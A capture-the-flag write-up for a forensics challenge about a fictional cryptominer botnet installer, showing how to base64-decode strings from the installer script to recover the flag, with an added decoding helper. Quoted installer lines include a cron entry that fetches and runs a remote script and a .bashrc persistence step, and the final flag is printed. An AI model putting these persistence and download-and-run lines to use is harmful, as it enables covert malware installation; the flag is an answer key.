Description
In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor’s miner’s installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor’s desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defenses to counter future threats.
The challenge provides a very long bash script that contains several base64-encoded strings, such as the ones below:
local url="http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg=="
dest=$(echo "X3QwX200cnN9Cg=="|base64 -d)
echo "ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==" | base64 -d >> /home/$USER/.bashrc
echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
All we have to do is to base64-decode those strings and gather the parts composing the final flag.
$ echo cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d
$ echo "X3QwX200cnN9Cg==" | base64 -d
$ echo "ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==" | base64 -d
$ echo -n cGFydDE9IkhUQnttMW4xbmciCg== | base64 -d
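On a script this long, picking the strings out by eye is easy to get wrong, so the same triage can be scripted. The block below is an added example, not part of the challenge or the original write-up: it pulls every base64-looking token out of a script on stdin and prints the ones that decode to printable text. The function names (`sample_script`, `try_decode`, `decode_b64_tokens`) and the 12-character minimum are assumptions made for this example; the sample input is the four lines quoted above.

```shell
#!/usr/bin/env bash
# Added example. Sample input: the four installer lines quoted in this write-up.
sample_script() {
cat <<'EOF'
local url="http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg=="
dest=$(echo "X3QwX200cnN9Cg=="|base64 -d)
echo "ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==" | base64 -d >> /home/$USER/.bashrc
echo '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'
EOF
}

# try_decode TOKEN: print the decoded text and succeed only if TOKEN is
# plausible base64 (12+ chars, length a multiple of 4) of printable text.
try_decode() {
  t=$1
  [ "${#t}" -ge 12 ] || return 1
  [ $(( ${#t} % 4 )) -eq 0 ] || return 1
  # NUL bytes are dropped so the shell can hold the result in a variable.
  out=$(printf '%s' "$t" | base64 -d 2>/dev/null | LC_ALL=C tr -d '\000')
  [ -n "$out" ] || return 1
  junk=$(printf '%s' "$out" | LC_ALL=C tr -d '[:print:][:space:]')
  [ -z "$junk" ] || return 1
  printf '%s' "$out"
}

# decode_b64_tokens: read a script on stdin, print "token<TAB>decoded text".
decode_b64_tokens() {
  grep -oE '[A-Za-z0-9+/]{12,}={0,2}' | while IFS= read -r tok; do
    while :; do
      if text=$(try_decode "$tok"); then
        printf '%s\t%s\n' "$tok" "$text"
        break
      fi
      # "/" is valid base64, so a URL path segment can glue itself onto a
      # token (htb/cGFy...). Drop the leading segment and retry.
      case $tok in
        */*) tok=${tok#*/} ;;
        *)   break ;;
      esac
    done
  done
}

sample_script | decode_b64_tokens
```

Tokens are reported in the order they appear in the script, so the `partN=` names in the decoded text, not the output order, tell you how to assemble them.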
Final Flag
HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}